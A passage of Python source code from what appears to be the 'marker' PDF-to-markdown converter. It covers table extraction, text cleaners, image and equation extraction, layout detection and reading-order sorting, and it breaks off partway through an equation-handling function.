TEXIFY_DTYPE(self) -> torch.dtype: return torch.float32 if self.TORCH_DEVICE_MODEL == "cpu" else torch.float16 class Config: env_file = find_dotenv("local.env") extra = "ignore" settings = Settings() File: marker/output.py import os import json def get_subfolder_path(out_folder, fname): subfolder_name = fname.rsplit('.', 1)[0] subfolder_path = os.path.join(out_folder, subfolder_name) return subfolder_path def get_markdown_filepath(out_folder, fname): subfolder_path = get_subfolder_path(out_folder, fname) out_filename = fname.rsplit(".", 1)[0] + ".md" out_filename = os.path.join(subfolder_path, out_filename) return out_filename def markdown_exists(out_folder, fname): out_filename = get_markdown_filepath(out_folder, fname) return os.path.exists(out_filename) def save_markdown(out_folder, fname, full_text, images, out_metadata): subfolder_path = get_subfolder_path(out_folder, fname) os.makedirs(subfolder_path, exist_ok=True) markdown_filepath = get_markdown_filepath(out_folder, fname) out_meta_filepath = markdown_filepath.rsplit(".", 1)[0] + "_meta.json" with open(markdown_filepath, "w+", encoding='utf-8') as f: f.write(full_text) with open(out_meta_filepath, "w+") as f: f.write(json.dumps(out_metadata, indent=4)) for filename, image in images.items(): image_filepath = os.path.join(subfolder_path, filename) image.save(image_filepath, "PNG") return subfolder_path File: marker/benchmark/scoring.py import math from rapidfuzz import fuzz import re import regex from statistics import mean CHUNK_MIN_CHARS = 25 def chunk_text(text, chunk_len=500): chunks = [text[i:i+chunk_len] for i in range(0, len(text), chunk_len)] chunks = [c for c in chunks if c.strip() and len(c) > CHUNK_MIN_CHARS] return chunks def overlap_score(hypothesis_chunks, reference_chunks): length_modifier = len(hypothesis_chunks) / len(reference_chunks) search_distance = max(len(reference_chunks) // 5, 10) chunk_scores = [] for i, hyp_chunk in enumerate(hypothesis_chunks): max_score = 0 total_len = 0 i_offset = int(i * length_modifier) chunk_range = range(max(0, i_offset-search_distance), min(len(reference_chunks), i_offset+search_distance)) for j in chunk_range: ref_chunk = reference_chunks[j] score = fuzz.ratio(hyp_chunk, ref_chunk, score_cutoff=30) / 100 if score > max_score: max_score = score total_len = len(ref_chunk) chunk_scores.append(max_score) return chunk_scores def score_text(hypothesis, reference): # Returns a 0-1 alignment score hypothesis_chunks = chunk_text(hypothesis) reference_chunks = chunk_text(reference) chunk_scores = overlap_score(hypothesis_chunks, reference_chunks) return mean(chunk_scores) File: marker/benchmark/table.py from rapidfuzz import fuzz import re def split_to_cells(table): table = table.strip() table = re.sub(r" {2,}", "", table) table_rows = table.split("\n") table_rows = [t for t in table_rows if t.strip()] table_cells = [r.split("|") for r in table_rows] return table_cells def align_rows(hypothesis, ref_row): best_alignment = [] best_alignment_score = 0 for j in range(0, len(hypothesis)): alignments = [] for i in range(len(ref_row)): if i >= len(hypothesis[j]): alignments.append(0) continue alignment = fuzz.ratio(hypothesis[j][i], ref_row[i], score_cutoff=30) / 100 alignments.append(alignment) if len(alignments) == 0: continue alignment_score = sum(alignments) / len(alignments) if alignment_score >= best_alignment_score: best_alignment = alignments best_alignment_score = alignment_score return best_alignment def score_table(hypothesis, reference): hypothesis = split_to_cells(hypothesis) reference = split_to_cells(reference) alignments = [] for i in range(0, len(reference)): alignments.extend(align_rows(hypothesis, reference[i])) return sum(alignments) / len(alignments) File: marker/tables/edges.py import math import cv2 import numpy as np def get_detected_lines_sobel(image): sobelx = cv2.Sobel(image, cv2.CV_32F, 1, 0, ksize=3) scaled_sobel = np.uint8(255 * sobelx / np.max(sobelx)) kernel = np.ones((4, 1), np.uint8) eroded = cv2.erode(scaled_sobel, kernel, iterations=1) scaled_sobel = cv2.dilate(eroded, kernel, iterations=3) return scaled_sobel def get_line_angle(x1, y1, x2, y2): slope = (y2 - y1) / (x2 - x1) angle_radians = math.atan(slope) angle_degrees = math.degrees(angle_radians) return angle_degrees def get_detected_lines(image, slope_tol_deg=10): new_image = image.astype(np.float32) * 255 # Convert to 0-255 range new_image = get_detected_lines_sobel(new_image) new_image = new_image.astype(np.uint8) edges = cv2.Canny(new_image, 50, 200, apertureSize=3) lines = cv2.HoughLinesP(edges, 1, np.pi / 180, threshold=50, minLineLength=2, maxLineGap=100) line_info = [] if lines is not None: for line in lines: x1, y1, x2, y2 = line[0] bbox = [x1, y1, x2, y2] vertical = False if x2 == x1: vertical = True else: line_angle = get_line_angle(x1, y1, x2, y2) if 90 - slope_tol_deg < line_angle < 90 + slope_tol_deg: vertical = True elif -90 - slope_tol_deg < line_angle < -90 + slope_tol_deg: vertical = True if not vertical: continue if bbox[3] < bbox[1]: bbox[1], bbox[3] = bbox[3], bbox[1] if bbox[2] < bbox[0]: bbox[0], bbox[2] = bbox[2], bbox[0] if vertical: line_info.append(bbox) return line_info def get_vertical_lines(image, divisor=2, x_tolerance=10, y_tolerance=1): vertical_lines = get_detected_lines(image) vertical_lines = sorted(vertical_lines, key=lambda x: x[0]) for line in vertical_lines: for i in range(0, len(line)): line[i] = (line[i] // divisor) * divisor # Merge adjacent line segments together to_remove = [] for i, line in enumerate(vertical_lines): for j, line2 in enumerate(vertical_lines): if j <= i: continue if line[0] != line2[0]: continue expanded_line1 = [line[0], line[1] - y_tolerance, line[2], line[3] + y_tolerance] line1_points = set(range(int(expanded_line1[1]), int(expanded_line1[3]))) line2_points = set(range(int(line2[1]), int(line2[3]))) intersect_y = len(line1_points.intersection(line2_points)) > 0 if intersect_y: vertical_lines[j][1] = min(line[1], line2[1]) vertical_lines[j][3] = max(line[3], line2[3]) to_remove.append(i) vertical_lines = [line for i, line in enumerate(vertical_lines) if i not in to_remove] # Remove redundant segments to_remove = [] for i, line in enumerate(vertical_lines): if i in to_remove: continue for j, line2 in enumerate(vertical_lines): if j <= i or j in to_remove: continue close_in_x = abs(line[0] - line2[0]) < x_tolerance line1_points = set(range(int(line[1]), int(line[3]))) line2_points = set(range(int(line2[1]), int(line2[3]))) intersect_y = len(line1_points.intersection(line2_points)) > 0 if close_in_x and intersect_y: # Keep the longer line and extend it if len(line2_points) > len(line1_points): vertical_lines[j][1] = min(line[1], line2[1]) vertical_lines[j][3] = max(line[3], line2[3]) to_remove.append(i) else: vertical_lines[i][1] = min(line[1], line2[1]) vertical_lines[i][3] = max(line[3], line2[3]) to_remove.append(j) vertical_lines = [line for i, line in enumerate(vertical_lines) if i not in to_remove] return vertical_lines File: marker/tables/utils.py import re def sort_table_blocks(blocks, tolerance=5): vertical_groups = {} for block in blocks: if hasattr(block, "bbox"): bbox = block.bbox else: bbox = block["bbox"] group_key = round((bbox[1] + bbox[3]) / 2 / tolerance) if group_key not in vertical_groups: vertical_groups[group_key] = [] vertical_groups[group_key].append(block) # Sort each group horizontally and flatten the groups into a single list sorted_blocks = [] for _, group in sorted(vertical_groups.items()): sorted_group = sorted(group, key=lambda x: x.bbox[0] if hasattr(x, "bbox") else x["bbox"][0]) sorted_blocks.extend(sorted_group) return sorted_blocks def replace_dots(text): dot_pattern = re.compile(r'(\s*\.\s*){4,}') dot_multiline_pattern = re.compile(r'.*(\s*\.\s*){4,}.*', re.DOTALL) if dot_multiline_pattern.match(text): text = dot_pattern.sub(' ', text) return text def replace_newlines(text): # Replace all newlines newline_pattern = re.compile(r'[\r\n]+') return newline_pattern.sub(' ', text).strip() File: marker/tables/table.py from marker.schema.bbox import merge_boxes, box_intersection_pct, rescale_bbox from marker.schema.block import Line, Span, Block from marker.schema.page import Page from tabulate import tabulate from typing import List from marker.settings import settings from marker.tables.cells import assign_cells_to_columns from marker.tables.utils import sort_table_blocks, replace_dots, replace_newlines def get_table_surya(page, table_box, space_tol=.01) -> List[List[str]]: table_rows = [] table_row = [] x_position = None sorted_blocks = sort_table_blocks(page.blocks) for block_idx, block in enumerate(sorted_blocks): sorted_lines = sort_table_blocks(block.lines) for line_idx, line in enumerate(sorted_lines): line_bbox = line.bbox intersect_pct = box_intersection_pct(line_bbox, table_box) if intersect_pct < settings.TABLE_INTERSECTION_THRESH or len(line.spans) == 0: continue normed_x_start = line_bbox[0] / page.width normed_x_end = line_bbox[2] / page.width cells = [[s.bbox, s.text] for s in line.spans] if x_position is None or normed_x_start > x_position - space_tol: # Same row table_row.extend(cells) else: # New row if len(table_row) > 0: table_rows.append(table_row) table_row = cells x_position = normed_x_end if len(table_row) > 0: table_rows.append(table_row) table_rows = assign_cells_to_columns(page, table_box, table_rows) return table_rows def get_table_pdftext(page: Page, table_box, space_tol=.01, round_factor=4) -> List[List[str]]: page_width = page.width table_rows = [] table_cell = "" cell_bbox = None table_row = [] sorted_char_blocks = sort_table_blocks(page.char_blocks) table_width = table_box[2] - table_box[0] new_line_start_x = table_box[0] + table_width * .3 table_width_pct = (table_width / page_width) * .95 for block_idx, block in enumerate(sorted_char_blocks): sorted_lines = sort_table_blocks(block["lines"]) for line_idx, line in enumerate(sorted_lines): line_bbox = line["bbox"] intersect_pct = box_intersection_pct(line_bbox, table_box) if intersect_pct < settings.TABLE_INTERSECTION_THRESH: continue for span in line["spans"]: for char in span["chars"]: x_start, y_start, x_end, y_end = char["bbox"] x_start /= page_width x_end /= page_width fullwidth_cell = False if cell_bbox is not None: # Find boundaries of cell bbox before merging cell_x_start, cell_y_start, cell_x_end, cell_y_end = cell_bbox cell_x_start /= page_width cell_x_end /= page_width fullwidth_cell = cell_x_end - cell_x_start >= table_width_pct cell_content = replace_dots(replace_newlines(table_cell)) if cell_bbox is None: # First char table_cell += char["char"] cell_bbox = char["bbox"] # Check if we are in the same cell, ensure cell is not full table width (like if stray text gets included in the table) elif (cell_x_start - space_tol < x_start < cell_x_end + space_tol) and not fullwidth_cell: table_cell += char["char"] cell_bbox = merge_boxes(cell_bbox, char["bbox"]) # New line and cell # Use x_start < new_line_start_x to account for out-of-order cells in the pdf elif x_start < cell_x_end - space_tol and x_start < new_line_start_x: if len(table_cell) > 0: table_row.append((cell_bbox, cell_content)) table_cell = char["char"] cell_bbox = char["bbox"] if len(table_row) > 0: table_row = sorted(table_row, key=lambda x: round(x[0][0] / round_factor)) table_rows.append(table_row) table_row = [] else: # Same line, new cell, check against cell bbox if len(table_cell) > 0: table_row.append((cell_bbox, cell_content)) table_cell = char["char"] cell_bbox = char["bbox"] if len(table_cell) > 0: table_row.append((cell_bbox, replace_dots(replace_newlines(table_cell)))) if len(table_row) > 0: table_row = sorted(table_row, key=lambda x: round(x[0][0] / round_factor)) table_rows.append(table_row) total_cells = sum([len(row) for row in table_rows]) if total_cells > 0: table_rows = assign_cells_to_columns(page, table_box, table_rows) return table_rows else: return [] def merge_tables(page_table_boxes): # Merge tables that are next to each other expansion_factor = 1.02 shrink_factor = .98 ignore_boxes = set() for i in range(len(page_table_boxes)): if i in ignore_boxes: continue for j in range(i + 1, len(page_table_boxes)): if j in ignore_boxes: continue expanded_box1 = [page_table_boxes[i][0] * shrink_factor, page_table_boxes[i][1], page_table_boxes[i][2] * expansion_factor, page_table_boxes[i][3]] expanded_box2 = [page_table_boxes[j][0] * shrink_factor, page_table_boxes[j][1], page_table_boxes[j][2] * expansion_factor, page_table_boxes[j][3]] if box_intersection_pct(expanded_box1, expanded_box2) > 0: page_table_boxes[i] = merge_boxes(page_table_boxes[i], page_table_boxes[j]) ignore_boxes.add(j) return [b for i, b in enumerate(page_table_boxes) if i not in ignore_boxes] def format_tables(pages: List[Page]): # Formats tables nicely into github flavored markdown table_count = 0 for page in pages: table_insert_points = {} blocks_to_remove = set() pnum = page.pnum page_table_boxes = [b for b in page.layout.bboxes if b.label == "Table"] page_table_boxes = [rescale_bbox(page.layout.image_bbox, page.bbox, b.bbox) for b in page_table_boxes] page_table_boxes = merge_tables(page_table_boxes) for table_idx, table_box in enumerate(page_table_boxes): for block_idx, block in enumerate(page.blocks): intersect_pct = block.intersection_pct(table_box) if intersect_pct > settings.TABLE_INTERSECTION_THRESH and block.block_type == "Table": if table_idx not in table_insert_points: table_insert_points[table_idx] = max(0, block_idx - len(blocks_to_remove)) # Where to insert the new table blocks_to_remove.add(block_idx) new_page_blocks = [] for block_idx, block in enumerate(page.blocks): if block_idx in blocks_to_remove: continue new_page_blocks.append(block) for table_idx, table_box in enumerate(page_table_boxes): if table_idx not in table_insert_points: continue if page.ocr_method == "surya": table_rows = get_table_surya(page, table_box) else: table_rows = get_table_pdftext(page, table_box) # Skip empty tables if len(table_rows) == 0: continue table_text = tabulate(table_rows, headers="firstrow", tablefmt="github", disable_numparse=True) table_block = Block( bbox=table_box, block_type="Table", pnum=pnum, lines=[Line( bbox=table_box, spans=[Span( bbox=table_box, span_id=f"{table_idx}_table", font="Table", font_size=0, font_weight=0, block_type="Table", text=table_text )] )] ) insert_point = table_insert_points[table_idx] insert_point = min(insert_point, len(new_page_blocks)) new_page_blocks.insert(insert_point, table_block) table_count += 1 page.blocks = new_page_blocks return table_count File: marker/tables/cells.py from marker.schema.bbox import rescale_bbox, box_intersection_pct from marker.schema.page import Page import numpy as np from sklearn.cluster import DBSCAN from marker.settings import settings def cluster_coords(coords, row_count): if len(coords) == 0: return [] coords = np.array(sorted(set(coords))).reshape(-1, 1) clustering = DBSCAN(eps=.01, min_samples=max(2, row_count // 4)).fit(coords) clusters = clustering.labels_ separators = [] for label in set(clusters): clustered_points = coords[clusters == label] separators.append(np.mean(clustered_points)) separators = sorted(separators) return separators def find_column_separators(page: Page, table_box, rows, round_factor=.002, min_count=1): left_edges = [] right_edges = [] centers = [] line_boxes = [p.bbox for p in page.text_lines.bboxes] line_boxes = [rescale_bbox(page.text_lines.image_bbox, page.bbox, l) for l in line_boxes] line_boxes = [l for l in line_boxes if box_intersection_pct(l, table_box) > settings.BBOX_INTERSECTION_THRESH] pwidth = page.bbox[2] - page.bbox[0] pheight = page.bbox[3] - page.bbox[1] for cell in line_boxes: ncell = [cell[0] / pwidth, cell[1] / pheight, cell[2] / pwidth, cell[3] / pheight] left_edges.append(ncell[0] / round_factor * round_factor) right_edges.append(ncell[2] / round_factor * round_factor) centers.append((ncell[0] + ncell[2]) / 2 * round_factor / round_factor) left_edges = [l for l in left_edges if left_edges.count(l) > min_count] right_edges = [r for r in right_edges if right_edges.count(r) > min_count] centers = [c for c in centers if centers.count(c) > min_count] sorted_left = cluster_coords(left_edges, len(rows)) sorted_right = cluster_coords(right_edges, len(rows)) sorted_center = cluster_coords(centers, len(rows)) # Find list with minimum length separators = max([sorted_left, sorted_right, sorted_center], key=len) separators.append(1) separators.insert(0, 0) return separators def assign_cells_to_columns(page, table_box, rows, round_factor=.002, tolerance=.01): separators = find_column_separators(page, table_box, rows, round_factor=round_factor) additional_column_index = 0 pwidth = page.bbox[2] - page.bbox[0] row_dicts = [] for row in rows: new_row = {} last_col_index = -1 for cell in row: left_edge = cell[0][0] / pwidth column_index = -1 for i, separator in enumerate(separators): if left_edge - tolerance < separator and last_col_index < i: column_index = i break if column_index == -1: column_index = len(separators) + additional_column_index additional_column_index += 1 new_row[column_index] = cell[1] last_col_index = column_index additional_column_index = 0 row_dicts.append(new_row) max_row_idx = 0 for row in row_dicts: max_row_idx = max(max_row_idx, max(row.keys())) # Assign sorted cells to columns, account for blanks new_rows = [] for row in row_dicts: flat_row = [] for row_idx in range(1, max_row_idx + 1): if row_idx in row: flat_row.append(row[row_idx]) else: flat_row.append("") new_rows.append(flat_row) # Pad rows to have the same length max_row_len = max([len(r) for r in new_rows]) for row in new_rows: while len(row) < max_row_len: row.append("") cols_to_remove = set() for idx, col in enumerate(zip(*new_rows)): col_total = sum([len(cell.strip()) > 0 for cell in col]) if col_total == 0: cols_to_remove.add(idx) rows = [] for row in new_rows: rows.append([col for idx, col in enumerate(row) if idx not in cols_to_remove]) return rows File: marker/cleaners/headings.py from typing import List from marker.settings import settings from marker.schema.bbox import rescale_bbox from marker.schema.block import bbox_from_lines from marker.schema.page import Page def split_heading_blocks(pages: List[Page]): # Heading lines can be combined into regular text blocks sometimes by pdftext # Split up heading lines into separate blocks properly for page in pages: page_heading_boxes = [b for b in page.layout.bboxes if b.label in ["Title", "Section-header"]] page_heading_boxes = [(rescale_bbox(page.layout.image_bbox, page.bbox, b.bbox), b.label) for b in page_heading_boxes] new_blocks = [] for block_idx, block in enumerate(page.blocks): if block.block_type not in ["Text"]: new_blocks.append(block) continue heading_lines = [] for line_idx, line in enumerate(block.lines): for (heading_box, label) in page_heading_boxes: if line.intersection_pct(heading_box) > settings.BBOX_INTERSECTION_THRESH: heading_lines.append((line_idx, label)) break if len(heading_lines) == 0: new_blocks.append(block) continue # Split up the block into separate blocks around headers start = 0 for (heading_line, label) in heading_lines: if start < heading_line: copied_block = block.copy() copied_block.lines = block.lines[start:heading_line] copied_block.bbox = bbox_from_lines(copied_block.lines) new_blocks.append(copied_block) copied_block = block.copy() copied_block.lines = block.lines[heading_line:heading_line + 1] copied_block.block_type = label copied_block.bbox = bbox_from_lines(copied_block.lines) new_blocks.append(copied_block) start = heading_line + 1 if start >= len(block.lines): break # Add any remaining lines if start < len(block.lines): copied_block = block.copy() copied_block.lines = block.lines[start:] copied_block.bbox = bbox_from_lines(copied_block.lines) new_blocks.append(copied_block) page.blocks = new_blocks File: marker/cleaners/bullets.py import re def replace_bullets(text): # Replace bullet characters with a - bullet_pattern = r"(^|[\n ])[•●○■▪▫–—]( )" replaced_string = re.sub(bullet_pattern, r"\1-\2", text) return replaced_string File: marker/cleaners/code.py from collections import Counter from statistics import mean, median from marker.schema.block import Span, Line from marker.schema.page import Page import re from typing import List def is_code_linelen(lines, thresh=80): # Decide based on chars per newline threshold total_alnum_chars = sum(len(re.findall(r'\w', line.prelim_text)) for line in lines) total_newlines = max(len(lines) - 1, 1) if total_alnum_chars == 0: return False ratio = total_alnum_chars / total_newlines return ratio < thresh def comment_count(lines): pattern = re.compile(r"^(//|#|'|--|/\*|'''|\"\"\"|--\[\[|<!--|%|%{|\(\*)") return sum([1 for line in lines if pattern.match(line)]) def identify_code_blocks(pages: List[Page]): code_block_count = 0 font_sizes = [] line_heights = [] for page in pages: font_sizes += page.get_font_sizes() line_heights += page.get_line_heights() avg_font_size = None avg_line_height = None if len(font_sizes) > 0: avg_line_height = median(line_heights) avg_font_size = mean(font_sizes) for page in pages: for block in page.blocks: if block.block_type != "Text": last_block = block continue # Ensure we have lines and spans if len(block.lines) == 0: continue if sum([len(line.spans) for line in block.lines]) == 0: continue min_start = block.get_min_line_start() is_indent = [] line_fonts = [] line_font_sizes = [] block_line_heights = [] for line in block.lines: line_fonts += [span.font for span in line.spans] line_font_sizes += [span.font_size for span in line.spans] block_line_heights.append(line.bbox[3] - line.bbox[1]) is_indent.append(line.bbox[0] > min_start) comment_lines = comment_count([line.prelim_text for line in block.lines]) is_code = [ len(block.lines) > 3, is_code_linelen(block.lines), sum(is_indent) + comment_lines > len(block.lines) * .7, # Indentation and comments are a majority ] if avg_font_size is not None: font_checks = [ mean(line_font_sizes) <= avg_font_size * .8, # Lower than average font size and line height mean(block_line_heights) < avg_line_height * .8 ] is_code += font_checks if all(is_code): code_block_count += 1 block.block_type = "Code" return code_block_count def indent_blocks(pages: List[Page]): span_counter = 0 for page in pages: for block in page.blocks: if block.block_type != "Code": continue lines = [] min_left = 1000 # will contain x- coord of column 0 col_width = 0 # width of 1 char for line in block.lines: text = "" min_left = min(line.bbox[0], min_left) for span in line.spans: if col_width == 0 and len(span.text) > 0: col_width = (span.bbox[2] - span.bbox[0]) / len(span.text) text += span.text lines.append((line.bbox, text)) block_text = "" blank_line = False for line in lines: text = line[1] if col_width == 0: prefix = "" else: prefix = " " * int((line[0][0] - min_left) / col_width) current_line_blank = len(text.strip()) == 0 if blank_line and current_line_blank: # Don't put multiple blank lines in a row continue block_text += prefix + text + "\n" blank_line = current_line_blank new_span = Span( text=block_text, bbox=block.bbox, span_id=f"{span_counter}_fix_code", font=block.lines[0].spans[0].font, font_weight=block.lines[0].spans[0].font_weight, font_size=block.lines[0].spans[0].font_size, ) span_counter += 1 block.lines = [Line(spans=[new_span], bbox=block.bbox)] File: marker/cleaners/fontstyle.py from typing import List from marker.schema.page import Page def find_bold_italic(pages: List[Page], bold_min_weight=600): font_weights = [] for page in pages: for block in page.blocks: # We don't want to bias our font stats if block.block_type in ["Title", "Section-header"]: continue for line in block.lines: for span in line.spans: if "bold" in span.font.lower(): span.bold = True if "ital" in span.font.lower(): span.italic = True font_weights.append(span.font_weight) if len(font_weights) == 0: return for page in pages: for block in page.blocks: for line in block.lines: for span in line.spans: if span.font_weight >= bold_min_weight: span.bold = True File: marker/cleaners/text.py import re def cleanup_text(full_text): full_text = re.sub(r'\n{3,}', '\n\n', full_text) full_text = re.sub(r'(\n\s){3,}', '\n\n', full_text) full_text = full_text.replace('\xa0', ' ') # Replace non-breaking spaces return full_text File: marker/cleaners/headers.py import re from collections import Counter from rapidfuzz import fuzz from marker.schema.merged import FullyMergedBlock from typing import List, Tuple def filter_common_elements(lines, page_count, threshold=.6): # We can't filter if we don't have enough pages to find common elements if page_count < 3: return [] text = [s.text for line in lines for s in line.spans if len(s.text) > 4] counter = Counter(text) common = [k for k, v in counter.items() if v > page_count * threshold] bad_span_ids = [s.span_id for line in lines for s in line.spans if s.text in common] return bad_span_ids def filter_header_footer(all_page_blocks, max_selected_lines=2): first_lines = [] last_lines = [] for page in all_page_blocks: nonblank_lines = page.get_nonblank_lines() first_lines.extend(nonblank_lines[:max_selected_lines]) last_lines.extend(nonblank_lines[-max_selected_lines:]) bad_span_ids = filter_common_elements(first_lines, len(all_page_blocks)) bad_span_ids += filter_common_elements(last_lines, len(all_page_blocks)) return bad_span_ids def replace_leading_trailing_digits(string, replacement): string = re.sub(r'^\d+', replacement, string) string = re.sub(r'\d+$', replacement, string) return string def find_overlap_elements(lst: List[Tuple[str, int]], string_match_thresh=.9, min_overlap=.05) -> List[int]: # Initialize a list to store the elements that meet the criteria result = [] titles = [l[0] for l in lst] for i, (str1, id_num) in enumerate(lst): overlap_count = 0 # Count the number of elements that overlap by at least 80% for j, str2 in enumerate(titles): if i != j and fuzz.ratio(str1, str2) >= string_match_thresh * 100: overlap_count += 1 # Check if the element overlaps with at least 50% of other elements if overlap_count >= max(3.0, len(lst) * min_overlap): result.append(id_num) return result def filter_common_titles(merged_blocks: List[FullyMergedBlock]) -> List[FullyMergedBlock]: titles = [] for i, block in enumerate(merged_blocks): if block.block_type in ["Title", "Section-header"]: text = block.text if text.strip().startswith("#"): text = re.sub(r'#+', '', text) text = text.strip() # Remove page numbers from start/end text = replace_leading_trailing_digits(text, "").strip() titles.append((text, i)) bad_block_ids = find_overlap_elements(titles) new_blocks = [] for i, block in enumerate(merged_blocks): if i in bad_block_ids: continue new_blocks.append(block) return new_blocks File: marker/images/save.py from typing import List from marker.schema.page import Page def get_image_filename(page: Page, image_idx): return f"{page.pnum}_image_{image_idx}.png" def images_to_dict(pages: List[Page]): images = {} for page in pages: if page.images is None: continue for image_idx, image in enumerate(page.images): image_filename = get_image_filename(page, image_idx) images[image_filename] = image return images File: marker/images/extract.py from marker.images.save import get_image_filename from marker.pdf.images import render_bbox_image from marker.schema.bbox import rescale_bbox from marker.schema.block import find_insert_block, Span, Line from marker.settings import settings def find_image_blocks(page): image_blocks = [] image_regions = [l.bbox for l in page.layout.bboxes if l.label in ["Figure", "Picture"]] image_regions = [rescale_bbox(page.layout.image_bbox, page.bbox, b) for b in image_regions] insert_points = {} for region_idx, region in enumerate(image_regions): for block_idx, block in enumerate(page.blocks): for line_idx, line in enumerate(block.lines): if line.intersection_pct(region) > settings.BBOX_INTERSECTION_THRESH: line.spans = [] # We will remove this line from the block if region_idx not in insert_points: insert_points[region_idx] = (block_idx, line_idx) # Account for images with no detected lines for region_idx, region in enumerate(image_regions): if region_idx in insert_points: continue insert_points[region_idx] = (find_insert_block(page.blocks, region), 0) for region_idx, image_region in enumerate(image_regions): image_insert = insert_points[region_idx] image_blocks.append([image_insert[0], image_insert[1], image_region]) return image_blocks def extract_page_images(page_obj, page): page.images = [] image_blocks = find_image_blocks(page) for image_idx, (block_idx, line_idx, bbox) in enumerate(image_blocks): if block_idx >= len(page.blocks): block_idx = len(page.blocks) - 1 if block_idx < 0: continue block = page.blocks[block_idx] image = render_bbox_image(page_obj, page, bbox) image_filename = get_image_filename(page, image_idx) image_markdown = f"\n\n![{image_filename}]({image_filename})\n\n" image_span = Span( bbox=bbox, text=image_markdown, font="Image", rotation=0, font_weight=0, font_size=0, image=True, span_id=f"image_{image_idx}" ) # Sometimes, the block has zero lines if len(block.lines) > line_idx: block.lines[line_idx].spans.append(image_span) else: line = Line( bbox=bbox, spans=[image_span] ) block.lines.append(line) page.images.append(image) def extract_images(doc, pages): for page_idx, page in enumerate(pages): page_obj = doc[page_idx] extract_page_images(page_obj, page) File: marker/layout/layout.py from typing import List from surya.layout import batch_layout_detection from marker.pdf.images import render_image from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.settings import settings def get_batch_size(): if settings.LAYOUT_BATCH_SIZE is not None: return settings.LAYOUT_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 6 return 6 def surya_layout(doc, pages: List[Page], layout_model, batch_multiplier=1): images = [render_image(doc[pnum], dpi=settings.SURYA_LAYOUT_DPI) for pnum in range(len(pages))] text_detection_results = [p.text_lines for p in pages] processor = layout_model.processor layout_results = batch_layout_detection(images, layout_model, processor, detection_results=text_detection_results, batch_size=int(get_batch_size() * batch_multiplier)) for page, layout_result in zip(pages, layout_results): page.layout = layout_result def annotate_block_types(pages: List[Page]): for page in pages: max_intersections = {} for i, block in enumerate(page.blocks): for j, layout_block in enumerate(page.layout.bboxes): layout_bbox = layout_block.bbox layout_bbox = rescale_bbox(page.layout.image_bbox, page.bbox, layout_bbox) intersection_pct = block.intersection_pct(layout_bbox) if i not in max_intersections: max_intersections[i] = (intersection_pct, j) elif intersection_pct > max_intersections[i][0]: max_intersections[i] = (intersection_pct, j) for i, block in enumerate(page.blocks): block = page.blocks[i] block_type = "Text" if i in max_intersections: j = max_intersections[i][1] block_type = page.layout.bboxes[j].label block.block_type = block_type File: marker/layout/order.py from collections import defaultdict from typing import List from surya.ordering import batch_ordering from marker.pdf.images import render_image from marker.pdf.utils import sort_block_group from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.settings import settings def get_batch_size(): if settings.ORDER_BATCH_SIZE is not None: return settings.ORDER_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 6 elif settings.TORCH_DEVICE_MODEL == "mps": return 6 return 6 def surya_order(doc, pages: List[Page], order_model, batch_multiplier=1): images = [render_image(doc[pnum], dpi=settings.SURYA_ORDER_DPI) for pnum in range(len(pages))] # Get bboxes for all pages bboxes = [] for page in pages: bbox = [b.bbox for b in page.layout.bboxes][:settings.ORDER_MAX_BBOXES] bboxes.append(bbox) processor = order_model.processor order_results = batch_ordering(images, bboxes, order_model, processor, batch_size=int(get_batch_size() * batch_multiplier)) for page, order_result in zip(pages, order_results): page.order = order_result def sort_blocks_in_reading_order(pages: List[Page]): for page in pages: order = page.order block_positions = {} max_position = 0 for i, block in enumerate(page.blocks): for order_box in order.bboxes: order_bbox = order_box.bbox position = order_box.position order_bbox = rescale_bbox(order.image_bbox, page.bbox, order_bbox) block_intersection = block.intersection_pct(order_bbox) if i not in block_positions: block_positions[i] = (block_intersection, position) elif block_intersection > block_positions[i][0]: block_positions[i] = (block_intersection, position) max_position = max(max_position, position) block_groups = defaultdict(list) for i, block in enumerate(page.blocks): if i in block_positions: position = block_positions[i][1] else: max_position += 1 position = max_position block_groups[position].append(block) new_blocks = [] for position in sorted(block_groups.keys()): block_group = sort_block_group(block_groups[position]) new_blocks.extend(block_group) page.blocks = new_blocks File: marker/equations/inference.py from texify.inference import batch_inference from tqdm import tqdm from marker.settings import settings import os os.environ["TOKENIZERS_PARALLELISM"] = "false" def get_batch_size(): if settings.TEXIFY_BATCH_SIZE is not None: return settings.TEXIFY_BATCH_SIZE elif settings.TORCH_DEVICE_MODEL == "cuda": return 6 elif settings.TORCH_DEVICE_MODEL == "mps": return 6 return 2 def get_latex_batched(images, token_counts, texify_model, batch_multiplier=1): if len(images) == 0: return [] predictions = [""] * len(images) batch_size = get_batch_size() * batch_multiplier for i in tqdm(range(0, len(images), batch_size), desc="Recognizing equations"): # Dynamically set max length to save inference time min_idx = i max_idx = min(min_idx + batch_size, len(images)) max_length = max(token_counts[min_idx:max_idx]) max_length = min(max_length, settings.TEXIFY_MODEL_MAX) max_length += settings.TEXIFY_TOKEN_BUFFER model_output = batch_inference(images[min_idx:max_idx], texify_model, texify_model.processor, max_tokens=max_length) for j, output in enumerate(model_output): token_count = get_total_texify_tokens(output, texify_model.processor) if token_count >= max_length - 1: output = "" image_idx = i + j predictions[image_idx] = output return predictions def get_total_texify_tokens(text, processor): tokenizer = processor.tokenizer tokens = tokenizer(text) return len(tokens["input_ids"]) File: marker/equations/equations.py from collections import defaultdict from copy import deepcopy from typing import List from marker.debug.data import dump_equation_debug_data from marker.equations.inference import get_total_texify_tokens, get_latex_batched from marker.pdf.images import render_bbox_image from marker.schema.bbox import rescale_bbox from marker.schema.page import Page from marker.schema.block import Line, Span, Block, bbox_from_lines, split_block_lines, find_insert_block from marker.settings import settings def find_equation_blocks(page, processor): equation_blocks = [] equation_regions = [l.bbox for l in page.layout.bboxes if l.label in ["Formula"]] equation_regions = [rescale_bbox(page.layout.image_bbox, page.bbox, b) for b in equation_regions] lines_to_remove = defaultdict(list) insert_points = {} equation_lines = defaultdict(list) for region_idx, region in enumerate(equation_regions): for block_idx, block in enumerate(page.blocks): for line_idx, line in enumerate(block.lines): if line.intersection_pct(region) > settings.BBOX_INTERSECTION_THRESH: # We will remove this line from the block lines_to_remove[region_idx].append((block_idx, line_idx)) equation_lines[region_idx].append(line) if region_idx not in insert_points: insert_points[region_idx] = (block_idx, line_idx) # Account for regions where the lines were not detected for region_idx, region in enumerate(equation_regions): if region_idx in insert_points: continue insert_points[region_idx] 